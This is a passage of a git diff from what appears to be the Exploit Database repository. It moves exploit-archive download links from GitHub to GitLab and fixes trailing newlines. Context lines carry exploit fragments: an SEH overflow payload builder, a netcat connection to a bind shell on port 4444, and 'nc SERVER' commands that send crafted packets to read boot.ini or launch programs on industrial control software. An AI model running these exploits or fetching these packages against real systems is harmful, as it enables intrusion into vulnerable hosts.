-https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/8875.zip (2009-OAmon_Exp.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/8875.zip (2009-OAmon_Exp.zip) Advisory: http://www.ntinternals.org/ntiadv0806/ntiadv0806.html diff --git a/exploits/windows/local/9301.txt b/exploits/windows/local/9301.txt index 95f61d3fc..337482419 100644 --- a/exploits/windows/local/9301.txt +++ b/exploits/windows/local/9301.txt @@ -28,7 +28,7 @@ Exploit: http://www.ntinternals.org/win32k/NtUserConsoleControl_Exp.zip -back: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/9301.zip (2009-NtUserConsoleControl_Exp.zip) +back: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/9301.zip (2009-NtUserConsoleControl_Exp.zip) Description: http://www.ntinternals.org/index.html#09_07_30 diff --git a/exploits/windows/local/9579.py b/exploits/windows/local/9579.py index 1dc855654..7b3b7eff3 100755 --- a/exploits/windows/local/9579.py +++ b/exploits/windows/local/9579.py @@ -13,6 +13,6 @@ # http://www.coromputer.net/CVE-2009-0927_package.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/9579.zip (2009-CVE-2009-0927_package.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/9579.zip (2009-CVE-2009-0927_package.zip) # milw0rm.com [2009-09-03] \ No newline at end of file diff --git a/exploits/windows/local/9895.txt b/exploits/windows/local/9895.txt index 59609af58..ed034dd0a 100644 --- a/exploits/windows/local/9895.txt +++ b/exploits/windows/local/9895.txt @@ -60,5 +60,4 @@ my $junk2 ="\x90" x 100; my $payload=$junk.$nseh.$seh.$nops.$shellcode.$junk2; open (myfile,">$sploitfile"); print myfile $payload; -close (myfile); - +close (myfile); \ No newline at end of file diff --git a/exploits/windows/remote/10542.py b/exploits/windows/remote/10542.py index fe0aa72f5..d9446c4fd 100755 --- a/exploits/windows/remote/10542.py +++ b/exploits/windows/remote/10542.py @@ -66,4 +66,4 @@ try: print "[-] send() error !" print "[+] Done " except: - print "[x] Socket() error!" + print "[x] Socket() error!" \ No newline at end of file diff --git a/exploits/windows/remote/11173.txt b/exploits/windows/remote/11173.txt index ee729e2dd..e56a3e00f 100644 --- a/exploits/windows/remote/11173.txt +++ b/exploits/windows/remote/11173.txt @@ -6,4 +6,4 @@ # Tested on: xpsp3 ie6 # Download: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/11173.zip (TrendMicro_web_deployment_activex0day.zip) \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/11173.zip (TrendMicro_web_deployment_activex0day.zip) \ No newline at end of file diff --git a/exploits/windows/remote/11661.txt b/exploits/windows/remote/11661.txt index a91191aab..cd55abce5 100644 --- a/exploits/windows/remote/11661.txt +++ b/exploits/windows/remote/11661.txt @@ -2,4 +2,4 @@ SAP GUI version 7.10 WebViewer3D Active-X JIT-Spray exploit Author: Alexey Sintsov Homepage: http://www.dsec.ru/ -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/11661.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/11661.zip \ No newline at end of file diff --git a/exploits/windows/remote/12614.txt b/exploits/windows/remote/12614.txt index eb3014e6a..13a3da50c 100644 --- a/exploits/windows/remote/12614.txt +++ b/exploits/windows/remote/12614.txt @@ -1,5 +1,5 @@ Download: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/12614.zip (safari_parent_close_sintsov.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/12614.zip (safari_parent_close_sintsov.zip) Unzip and run START.htm diff --git a/exploits/windows/remote/14179.txt b/exploits/windows/remote/14179.txt index d4f6ee090..963331cd8 100644 --- a/exploits/windows/remote/14179.txt +++ b/exploits/windows/remote/14179.txt @@ -5,4 +5,4 @@ This vulnerability is because of using Alternate Data Stream to open a protected authentication methods can be circumvented. In this technique, we can add a “:$i30:$INDEX_ALLOCATION” to a directory name to bypass the authentication. Download: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/14179.pdf (IIS5.1_Authentication_Bypass.pdf) \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/14179.pdf (IIS5.1_Authentication_Bypass.pdf) \ No newline at end of file diff --git a/exploits/windows/remote/14267.txt b/exploits/windows/remote/14267.txt index ee691e6ce..5e38a9d1f 100644 --- a/exploits/windows/remote/14267.txt +++ b/exploits/windows/remote/14267.txt @@ -87,7 +87,7 @@ possible to disable this feature. http://aluigi.org/testz/onlywebs.zip or -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/14267.zip (bfonlywebs.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/14267.zip (bfonlywebs.zip) - launch: onlywebs.exe c:\malicious_file.exe - start the server launcher using the following string as sponsor and diff --git a/exploits/windows/remote/14275.txt b/exploits/windows/remote/14275.txt index 37a8a45a8..bd51767be 100644 --- a/exploits/windows/remote/14275.txt +++ b/exploits/windows/remote/14275.txt @@ -8,7 +8,7 @@ This bug utilizes Microsoft Help vuln for RCE. You can test by browsing to http://krash.in/real-exp/exploit.ram -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/14275.tar (rp-0day-08-07-2010.tar) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/14275.tar (rp-0day-08-07-2010.tar) --webDEViL \ No newline at end of file diff --git a/exploits/windows/remote/14385.html b/exploits/windows/remote/14385.html index ab3855452..a42e549d8 100644 --- a/exploits/windows/remote/14385.html +++ b/exploits/windows/remote/14385.html @@ -40,6 +40,4 @@ onmouseover="document.location='http://www.Securitylab.ir/ClickJacking';"> - - - + \ No newline at end of file diff --git a/exploits/windows/remote/14447.html b/exploits/windows/remote/14447.html index 6aa0a5e9d..6f53b8051 100644 --- a/exploits/windows/remote/14447.html +++ b/exploits/windows/remote/14447.html @@ -29,5 +29,4 @@ function clickjack_armor(evt)
Pouya Daneshmand, Securitylab.ir
- - + \ No newline at end of file diff --git a/exploits/windows/remote/14599.txt b/exploits/windows/remote/14599.txt index a33d5914a..d80b81f05 100644 --- a/exploits/windows/remote/14599.txt +++ b/exploits/windows/remote/14599.txt @@ -1,4 +1,4 @@ Tested on my XPSP3+IE7+/nx=AlwaysOn, should work on Windows 7 with the proper return value. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/14599.rar (Dr_IDE-AoA-JIT.rar) \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/14599.rar (Dr_IDE-AoA-JIT.rar) \ No newline at end of file diff --git a/exploits/windows/remote/14674.txt b/exploits/windows/remote/14674.txt index 0a95d46ad..bb4294ce6 100644 --- a/exploits/windows/remote/14674.txt +++ b/exploits/windows/remote/14674.txt @@ -43,4 +43,4 @@ http://blog.metasploit.com/2009/10/smb2-351-packets-from-trampoline.html =========================================================================== Download: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/14674.zip (smb2_exploit_release.zip) \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/14674.zip (smb2_exploit_release.zip) \ No newline at end of file diff --git a/exploits/windows/remote/14853.py b/exploits/windows/remote/14853.py index e52fa8342..c92ea4a20 100755 --- a/exploits/windows/remote/14853.py +++ b/exploits/windows/remote/14853.py @@ -7,7 +7,7 @@ |_| |_|\____/_/ \_\____/|____/ http://www.exploit-db.com/adobe-acrobat-newclass-invalid-pointer-vulnerability/ -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/14853.tar.gz (moaub1-adobe-newclass.tar.gz) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/14853.tar.gz (moaub1-adobe-newclass.tar.gz) Title : Adobe Acrobat Reader and Flash Player “newclass” invalid pointer vulnerability Analysis : http://www.abysssec.com diff --git a/exploits/windows/remote/14886.py b/exploits/windows/remote/14886.py index 4f2e25c8f..d41ba8e29 100755 --- a/exploits/windows/remote/14886.py +++ b/exploits/windows/remote/14886.py @@ -7,7 +7,7 @@ |_| |_|\____/_/ \_\____/|____/ http://www.exploit-db.com/movie-maker-remote-code-execution-ms10-016/ - https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/14886.zip (Movie-Maker-Remote-Code-Execution-Exploit.zip) + https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/14886.zip (Movie-Maker-Remote-Code-Execution-Exploit.zip) Title : Movie Maker Remote Code Execution (MS10-016) Version : moviemk.exe 2.1 (XP SP3) diff --git a/exploits/windows/remote/14895.py b/exploits/windows/remote/14895.py index db20e6443..76de31d74 100755 --- a/exploits/windows/remote/14895.py +++ b/exploits/windows/remote/14895.py @@ -7,7 +7,7 @@ |_| |_|\____/_/ \_\____/|____/ http://www.exploit-db.com/moaub-5-microsoft-mpeg-layer-3-audio-stack-based-overflow/ - https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/14895.zip (moaub-5-exploit.zip) + https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/14895.zip (moaub-5-exploit.zip) ''' diff --git a/exploits/windows/remote/15056.py b/exploits/windows/remote/15056.py index e0cf42ee7..f2d75eeee 100755 --- a/exploits/windows/remote/15056.py +++ b/exploits/windows/remote/15056.py @@ -20,7 +20,7 @@ MOAUB Number : MOAUB_20_BA http://www.exploit-db.com/moaub-20-java-cmm-readmabcurvedata-stack-overflow/ -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/15056.zip (moaub-20-exploit.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/15056.zip (moaub-20-exploit.zip) ''' import sys diff --git a/exploits/windows/remote/15235.html b/exploits/windows/remote/15235.html index a39eab5ec..20d62ca7e 100644 --- a/exploits/windows/remote/15235.html +++ b/exploits/windows/remote/15235.html @@ -190,4 +190,4 @@ arg5="defaultV" target.InitLicenKeys arg1 ,arg2 ,arg3 ,arg4 ,arg5 - + \ No newline at end of file diff --git a/exploits/windows/remote/15241.txt b/exploits/windows/remote/15241.txt index 500f603ba..b381d12d0 100644 --- a/exploits/windows/remote/15241.txt +++ b/exploits/windows/remote/15241.txt @@ -60,4 +60,4 @@ SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS -Code: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/15241.zip (iExploit12-DEP.zip) \ No newline at end of file +Code: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/15241.zip (iExploit12-DEP.zip) \ No newline at end of file diff --git a/exploits/windows/remote/15296.txt b/exploits/windows/remote/15296.txt index b16356923..8a79beeb2 100644 --- a/exploits/windows/remote/15296.txt +++ b/exploits/windows/remote/15296.txt @@ -213,7 +213,7 @@ The sample + exploit are tested on patched windows XP service pack 3. here is exploit + binary analysis link: http://abysssec.com/files/Adobe_Shockwave_Director_rcsL_Chunk_Memory_Corruption.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/15296.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/15296.zip PS 1 : this vulnerability is not patched bug released by ZDI http://www.zerodayinitiative.com/advisories/ZDI-10-162/ PS 2 : itís possible to exploit this vulnerability on modern windows like Vista/7 too and itís up to readers Ö \ No newline at end of file diff --git a/exploits/windows/remote/15869.txt b/exploits/windows/remote/15869.txt index 3f5beabbb..91fc9fda2 100644 --- a/exploits/windows/remote/15869.txt +++ b/exploits/windows/remote/15869.txt @@ -48,4 +48,4 @@ However, here we are. And two of three are unpatched. proof of concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/15869.zip (9sg_ca_d2d.zip) \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/15869.zip (9sg_ca_d2d.zip) \ No newline at end of file diff --git a/exploits/windows/remote/16594.rb b/exploits/windows/remote/16594.rb index 332b19641..1577b66f4 100755 --- a/exploits/windows/remote/16594.rb +++ b/exploits/windows/remote/16594.rb @@ -31,7 +31,7 @@ class Metasploit3 < Msf::Exploit::Remote [ [ 'CVE', '2010-3653'], [ 'OSVDB', '68803'], - [ 'URL', 'https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/15296.zip' ], + [ 'URL', 'https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/15296.zip' ], ], 'DefaultOptions' => { diff --git a/exploits/windows/remote/17022.txt b/exploits/windows/remote/17022.txt index b12621daa..8cdaa13bd 100644 --- a/exploits/windows/remote/17022.txt +++ b/exploits/windows/remote/17022.txt @@ -6,8 +6,8 @@ http://aluigi.org/adv/factorylink_4-adv.txt http://aluigi.org/adv/factorylink_5-adv.txt http://aluigi.org/adv/factorylink_6-adv.txt -Advisory Archive: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17022-1.tar.gz (siemens_factory_link_adv.tar.gz) -PoC Archive: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17022-2.tar.gz (siemens_factory_link_poc.tar.gz) +Advisory Archive: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17022-1.tar.gz (siemens_factory_link_adv.tar.gz) +PoC Archive: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17022-2.tar.gz (siemens_factory_link_poc.tar.gz) ####################################################################### @@ -57,7 +57,7 @@ The Code http://aluigi.org/poc/factorylink_x.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17022-x.zip (factorylink_x.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17022-x.zip (factorylink_x.zip) factorylink_x 3 SERVER @@ -84,7 +84,7 @@ The Code http://aluigi.org/poc/factorylink_x.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17022-x.zip (factorylink_x.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17022-x.zip (factorylink_x.zip) for downloading c:\boot.ini factorylink_x 4 SERVER @@ -116,7 +116,7 @@ The Code =========== http://aluigi.org/poc/factorylink_3.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17022-3.zip (factorylink_3.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17022-3.zip (factorylink_3.zip) nc SERVER 7579 < factorylink_3.dat @@ -143,7 +143,7 @@ The Code =========== http://aluigi.org/poc/factorylink_4.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17022-4.zip (factorylink_4.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17022-4.zip (factorylink_4.zip) nc SERVER 7579 < factorylink_4.dat @@ -167,7 +167,7 @@ The Code =========== http://aluigi.org/poc/factorylink_5.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17022-5.zip (factorylink_5.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17022-5.zip (factorylink_5.zip) download c:\boot.ini nc SERVER 7579 < factorylink_5.dat @@ -191,7 +191,7 @@ The Code =========== http://aluigi.org/poc/factorylink_x.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17022-x.zip (factorylink_x.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17022-x.zip (factorylink_x.zip) factorylink_x 1 SERVER factorylink_x 2 SERVER diff --git a/exploits/windows/remote/17024.txt b/exploits/windows/remote/17024.txt index feb1e4360..618aaa16e 100644 --- a/exploits/windows/remote/17024.txt +++ b/exploits/windows/remote/17024.txt @@ -8,8 +8,8 @@ http://aluigi.org/adv/igss_6-adv.txt http://aluigi.org/adv/igss_7-adv.txt http://aluigi.org/adv/igss_8-adv.txt -Advisory Archive: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17024-adv.tar.gz (igss_adv.tar.gz) -PoC Archive: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17024-poc.tar.gz (igss_poc.tar.gz) +Advisory Archive: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17024-adv.tar.gz (igss_adv.tar.gz) +PoC Archive: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17024-poc.tar.gz (igss_poc.tar.gz) ####################################################################### @@ -69,7 +69,7 @@ The Code =========== http://aluigi.org/poc/igss_1.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17024-1.zip (igss_1.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17024-1.zip (igss_1.zip) example for downloading c:\boot.ini: nc SERVER 12401 < igss_1a.dat @@ -113,7 +113,7 @@ The Code =========== http://aluigi.org/poc/igss_2.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17024-2.zip (igss_2.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17024-2.zip (igss_2.zip) nc SERVER 12401 < igss_2a.dat nc SERVER 12401 < igss_2b.dat @@ -176,7 +176,7 @@ The Code =========== http://aluigi.org/poc/igss_3.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17024-3.zip (igss_3.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17024-3.zip (igss_3.zip) nc SERVER 12401 < igss_3.dat @@ -215,7 +215,7 @@ The Code =========== http://aluigi.org/poc/igss_4.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17024-4.zip (igss_4.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17024-4.zip (igss_4.zip) Proof-of-concept via "ReadFile": nc SERVER 12401 < igss_4a.dat @@ -265,7 +265,7 @@ The following proof-of-concept exploits the vulnerability from the other vulnerabilities before the reaching of this bugged function: http://aluigi.org/poc/igss_5.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17024-5.zip (igss_5.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17024-5.zip (igss_5.zip) nc SERVER 12401 < igss_5a.dat (will add the "old_name" template) nc SERVER 12401 < igss_5b.dat @@ -312,7 +312,7 @@ The Code =========== http://aluigi.org/poc/igss_6.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17024-6.zip (igss_6.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17024-6.zip (igss_6.zip) nc SERVER 12401 < igss_6.dat @@ -351,7 +351,7 @@ The Code =========== http://aluigi.org/poc/igss_7.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17024-7.zip (igss_7.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17024-7.zip (igss_7.zip) nc SERVER 12401 < igss_7.dat @@ -379,7 +379,7 @@ The Code http://aluigi.org/poc/igss_8.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17024-8.zip (igss_8.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17024-8.zip (igss_8.zip) Two examples for executing calc.exe ("calc.exe arg1 arg2 arg3"): nc SERVER 12397 < igss_8a.dat diff --git a/exploits/windows/remote/17104.txt b/exploits/windows/remote/17104.txt index 2acc8290a..fc2f72f67 100644 --- a/exploits/windows/remote/17104.txt +++ b/exploits/windows/remote/17104.txt @@ -349,4 +349,4 @@ binary info: POC: pocs availiable here: http://retrogod.altervista.org/9sg_realgames_i.html - https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17104.zip (9sg_StubbyUtil.ShellCtl.1.zip) \ No newline at end of file + https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17104.zip (9sg_StubbyUtil.ShellCtl.1.zip) \ No newline at end of file diff --git a/exploits/windows/remote/17105.txt b/exploits/windows/remote/17105.txt index e56baa153..1d9e2fc76 100644 --- a/exploits/windows/remote/17105.txt +++ b/exploits/windows/remote/17105.txt @@ -226,4 +226,4 @@ binary info: poc: pocs availiable here: http://retrogod.altervista.org/9sg_realgames_ii.html - https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17105.zip (9sg_StubbyUtil.ProcessMgr.1.zip) \ No newline at end of file + https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17105.zip (9sg_StubbyUtil.ProcessMgr.1.zip) \ No newline at end of file diff --git a/exploits/windows/remote/17187.txt b/exploits/windows/remote/17187.txt index 26ba61bef..c6bdc9219 100644 --- a/exploits/windows/remote/17187.txt +++ b/exploits/windows/remote/17187.txt @@ -19,4 +19,4 @@ Note: In using strings as a buffer for shellcode in action script, it is importa Here you can get our reliable exploit against windows 7 : calc.exe payload -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17187.zip (CVE-2010-3654_Win7.zip) \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17187.zip (CVE-2010-3654_Win7.zip) \ No newline at end of file diff --git a/exploits/windows/remote/17419.zip b/exploits/windows/remote/17419.zip index 2d5220dfc..d8f20ab75 100644 --- a/exploits/windows/remote/17419.zip +++ b/exploits/windows/remote/17419.zip @@ -17,8 +17,8 @@ reliably on Windows7. there is two version of this exploit XP and 7 and both use different method that used in MSF Exploit bounty ! -XP Version: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17419-1.zip (nsTreeRange_XP.zip) -Win7 Version: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17419-2.zip (nsTreeRange_7.zip) +XP Version: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17419-1.zip (nsTreeRange_XP.zip) +Win7 Version: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17419-2.zip (nsTreeRange_7.zip) diff --git a/exploits/windows/remote/17517.txt b/exploits/windows/remote/17517.txt index 3a0bc424d..7e4939ef2 100644 --- a/exploits/windows/remote/17517.txt +++ b/exploits/windows/remote/17517.txt @@ -13,4 +13,4 @@ Symantec Disclosure link: http://www.symantec.com/business/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2011&suid=20110526_00 iViZ Disclosure link: goo.gl/1vzdE -Exploit Code: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17517.zip (SymantecReplay.zip) \ No newline at end of file +Exploit Code: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17517.zip (SymantecReplay.zip) \ No newline at end of file diff --git a/exploits/windows/remote/17550.py b/exploits/windows/remote/17550.py index 411bbabb9..8b79d4601 100755 --- a/exploits/windows/remote/17550.py +++ b/exploits/windows/remote/17550.py @@ -64,4 +64,4 @@ if __name__ == '__main__': host = sys.argv[1] port = sys.argv[2] sploit(host, int(port)) - os.system("nc " + host + " 4444") + os.system("nc " + host + " 4444") \ No newline at end of file diff --git a/exploits/windows/remote/17575.txt b/exploits/windows/remote/17575.txt index 8e664fd06..bb199a41b 100644 --- a/exploits/windows/remote/17575.txt +++ b/exploits/windows/remote/17575.txt @@ -23,4 +23,4 @@ CVEs listed in APPLE-SA-2011-07-20-1. and follow @abysssec for updates http://www.abysssec.com/files/CVE-2011-0222_WinXP_Exploit.zip - https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17575.zip (CVE-2011-0222_WinXP_Exploit.zip) \ No newline at end of file + https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17575.zip (CVE-2011-0222_WinXP_Exploit.zip) \ No newline at end of file diff --git a/exploits/windows/remote/17974.html b/exploits/windows/remote/17974.html index 1dc65c035..2b5fed6b0 100644 --- a/exploits/windows/remote/17974.html +++ b/exploits/windows/remote/17974.html @@ -2,7 +2,7 @@ # Date: 12 Oct 2011 # Author: Matteo Memelli ryujin -AT- offensive-security.com # CVE-2011-2371 -# Full exploit package: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17974.zip +# Full exploit package: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17974.zip @@ -16,7 +16,7 @@ Date: 12 Oct 2011
Author: Matteo Memelli ryujin -AT- offensive-security.com
CVE-2011-2371
Full exploit package:
-https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17974.zip
+https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17974.zip

Thx to dookie for helping ;)
Vulnerability discovered by Chris Rohlf and Yan Ivnitskiy of Matasano Security
diff --git a/exploits/windows/remote/17977.txt b/exploits/windows/remote/17977.txt index 5a63287cc..1d64c32ef 100644 --- a/exploits/windows/remote/17977.txt +++ b/exploits/windows/remote/17977.txt @@ -24,4 +24,4 @@ FILES: CHEERS, KINGCOPE -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17977.tar.bz2 (DAYTONA_FULL.tar.bz2) \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17977.tar.bz2 (DAYTONA_FULL.tar.bz2) \ No newline at end of file diff --git a/exploits/windows/remote/18016.txt b/exploits/windows/remote/18016.txt index aa7af653e..2e4dbf749 100644 --- a/exploits/windows/remote/18016.txt +++ b/exploits/windows/remote/18016.txt @@ -59,4 +59,4 @@ The resulting file will look like this: poc, which overwrites boot.ini: http://retrogod.altervista.org/9sg_autovueiii.zip -Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/18016.zip (9sg_autovueiii.zip) \ No newline at end of file +Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/18016.zip (9sg_autovueiii.zip) \ No newline at end of file diff --git a/exploits/windows/remote/18437.txt b/exploits/windows/remote/18437.txt index 8c2d17403..86242ddf7 100644 --- a/exploits/windows/remote/18437.txt +++ b/exploits/windows/remote/18437.txt @@ -5,7 +5,7 @@ # contact : info [at] abysssec.com # http://www.abysssec.com/blog/2012/01/31/exploiting-cve-2011-2140-another-flash-player-vulnerability # -# Full PoC: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/18437.zip (CVE-2011-2140.zip) +# Full PoC: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/18437.zip (CVE-2011-2140.zip) # import sys diff --git a/exploits/windows/remote/18531.html b/exploits/windows/remote/18531.html index 0ccd6e3fa..1689db02a 100644 --- a/exploits/windows/remote/18531.html +++ b/exploits/windows/remote/18531.html @@ -1,6 +1,6 @@ - + \ No newline at end of file diff --git a/exploits/windows/remote/19570.txt b/exploits/windows/remote/19570.txt index 21e4dddef..d7466f82f 100644 --- a/exploits/windows/remote/19570.txt +++ b/exploits/windows/remote/19570.txt @@ -5,4 +5,4 @@ WFTPD is reported prone to a remote buffer overflow vulnerability. The issue exi This vulnerability may be exploited by a remote authenticate attacker to execute arbitrary code in the context of the affected service. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19570.tgz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19570.tgz \ No newline at end of file diff --git a/exploits/windows/remote/19580.txt b/exploits/windows/remote/19580.txt index d3a5a8f11..29eb4c37f 100644 --- a/exploits/windows/remote/19580.txt +++ b/exploits/windows/remote/19580.txt @@ -2,4 +2,4 @@ source: https://www.securityfocus.com/bid/755/info The Avirt Mail Server 3.3a and 3.5 packages are vulnerable to a remote buffer overflow vulnerability. The buffer overflow can be initiated by passing 856 characters in the password field. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19580.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19580.zip \ No newline at end of file diff --git a/exploits/windows/remote/19581.txt b/exploits/windows/remote/19581.txt index 6f4b748be..3754aa7b8 100644 --- a/exploits/windows/remote/19581.txt +++ b/exploits/windows/remote/19581.txt @@ -482,4 +482,4 @@ endp end start -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19581.exe \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19581.exe \ No newline at end of file diff --git a/exploits/windows/remote/19611.txt b/exploits/windows/remote/19611.txt index 228f338f2..bb734ef3d 100644 --- a/exploits/windows/remote/19611.txt +++ b/exploits/windows/remote/19611.txt @@ -2,4 +2,4 @@ source: https://www.securityfocus.com/bid/783/info If an unusually long user name is passed to the Broker FTP server 